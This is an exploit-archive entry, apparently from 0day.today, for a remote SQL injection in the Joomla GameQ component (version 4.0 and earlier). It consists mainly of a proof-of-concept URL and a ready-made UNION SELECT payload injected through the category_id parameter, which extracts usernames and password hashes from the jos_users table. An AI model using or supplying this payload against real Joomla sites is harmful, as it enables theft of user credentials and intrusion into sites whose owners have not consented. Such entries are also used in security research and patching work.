id: 3125
date: 06/05/2008
title: Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability
author: His0k4
cves: 

================================================================
Joomla Component GameQ <= 4.0 Remote SQL injection Vulnerability
================================================================



/---------------------------------------------------------------\
\                                				/
/         Joomla Component GameQ Remote SQL injection           \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--



#  0day.today [2023-03-24]  #